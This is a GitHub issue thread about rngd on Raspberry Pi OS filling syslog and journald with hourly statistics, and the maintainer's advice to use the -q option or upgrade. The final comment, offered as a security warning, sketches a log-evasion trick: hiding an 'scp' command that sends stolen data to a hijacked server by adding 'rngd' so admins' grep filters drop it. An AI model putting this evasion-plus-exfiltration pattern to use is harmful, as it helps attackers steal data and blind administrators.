### ISSUE TITLE
Unnecessary logging of statistics

### ISSUE THREAD

**Issue by rustequal** [nhorman/rng-tools#93]
Hello. It would be great to have a configuration parameter that would prohibit the output of hourly statistics. RSysLog and Journald is full of statistics output for this service. If I can disable "rngd" logging in RSysLog, then Journald still drags these logs to itself. I am very disturbed by the hourly output of "rngd" statistics.

**Comment by nhorman** [comment]
what hourly statistics are you referring to?   Theres no such hourly logging in rngd, and for any periodic logging that may be in place, it can be silenced by passing the -q  option

**Comment by rustequal** [comment]
I am using the latest "Raspbian OS Buster" software for Raspberry PI4. The version of the package "rng-tools" included in the latest image "Raspbian OS 10 Buster":

```
pi@zabbix-proxy:~ $ /usr/sbin/rngd -V
rngd 2-unofficial-mt.14
Copyright (c) 2001-2004 by Jeff Garzik
Copyright (c) 2004,2005 by Henrique de Moraes Holschuh
Copyright (c) 2001 by Philipp Rumpf
This is free software; see the source for copying conditions.  There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```

Looks like they use a very old version in the image, which does not yet have the "-q " key, and which writes statistics to the log once an hour:

```
May 29 00:41:28 zabbix-proxy rngd[314]: stats: bits received from HRNG source: 300064
May 29 00:41:28 zabbix-proxy rngd[314]: stats: bits sent to kernel pool: 244608
May 29 00:41:28 zabbix-proxy rngd[314]: stats: entropy added to kernel pool: 244608
May 29 00:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2 successes: 15
May 29 00:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2 failures: 0
May 29 00:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Monobit: 0
May 29 00:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Poker: 0
May 29 00:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Runs: 0
May 29 00:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Long run: 0
May 29 00:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Continuous run: 0
May 29 00:41:28 zabbix-proxy rngd[314]: stats: HRNG source speed: (min=340.046; avg=485.166; max=507.661)Kibits/s
May 29 00:41:28 zabbix-proxy rngd[314]: stats: FIPS tests speed: (min=11.730; avg=12.442; max=15.234)Mibits/s
May 29 00:41:28 zabbix-proxy rngd[314]: stats: Lowest ready-buffers level: 2
May 29 00:41:28 zabbix-proxy rngd[314]: stats: Entropy starvations: 0
May 29 00:41:28 zabbix-proxy rngd[314]: stats: Time spent starving for entropy: (min=0; avg=0.000; max=0)us

May 29 01:41:28 zabbix-proxy rngd[314]: stats: bits received from HRNG source: 320064
May 29 01:41:28 zabbix-proxy rngd[314]: stats: bits sent to kernel pool: 274848
May 29 01:41:28 zabbix-proxy rngd[314]: stats: entropy added to kernel pool: 274848
May 29 01:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2 successes: 16
May 29 01:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2 failures: 0
May 29 01:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Monobit: 0
May 29 01:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Poker: 0
May 29 01:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Runs: 0
May 29 01:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Long run: 0
May 29 01:41:28 zabbix-proxy rngd[314]: stats: FIPS 140-2(2001-10-10) Continuous run: 0
May 29 01:41:28 zabbix-proxy rngd[314]: stats: HRNG source speed: (min=340.046; avg=486.216; max=507.661)Kibits/s
May 29 01:41:28 zabbix-proxy rngd[314]: stats: FIPS tests speed: (min=11.730; avg=12.430; max=15.234)Mibits/s
May 29 01:41:28 zabbix-proxy rngd[314]: stats: Lowest ready-buffers level: 2
May 29 01:41:28 zabbix-proxy rngd[314]: stats: Entropy starvations: 0
May 29 01:41:28 zabbix-proxy rngd[314]: stats: Time spent starving for entropy: (min=0; avg=0.000; max=0)us
```

I'm sorry, I don't think this question should be addressed to you. Rather to those who build the image.

**Comment by nhorman** [comment]
yeah, that is....super old, like more than 3 years old, as I added my name to the -V option back in 2017, and I've been the maintainer for 5 years prior to that.  I would strongly recommend having them update their package to the latest upstream, or if you're interested, just build it yourself.  You'll find the debug output is much more controllable

**Comment by BigRedTower** [comment]
RPi folks didn't get the memo, because this is still an issue that has to be manually addressed per new install of RPi OS. 'journalctl' should be called 'rngd-debug-log''.

This seems to be a serious security vulnerability because it means the string "rngd" is likely being grepped out of the journalctl command on most RPis. I wouldn't assume that everyone learned the proper way to silence this spam, so grep -v is probably the more common method. So, when attacking an RPi, an attacker could simply include the string "rngd" anywhere in their sudo commands, and their activities could go completely unnoticed by the administrator. Cater malicious software to accept and disregard "--pwned rngd" on the commandline and the sudo commands will be invisible since many RPi admins will be fearlessly grepping them out, as-per standard practice.

sudo scp [private data I want to steal] [hijacked server to dump it to] | echo "thanks for the help, rngd ;) they not gonna see me. would not be possible without your flanking assist."
^^ will likely be grepped out by admin trying to see through the rngd log flood.

rsyslog offered filtering by process name, but now that journalctl is the way, and there's no way to do this besides grep, I consider it a noteworthy security vulnerability. On RPi, rngd helps sudo commands stay under the radar.

This type of log flooding should be off by default.
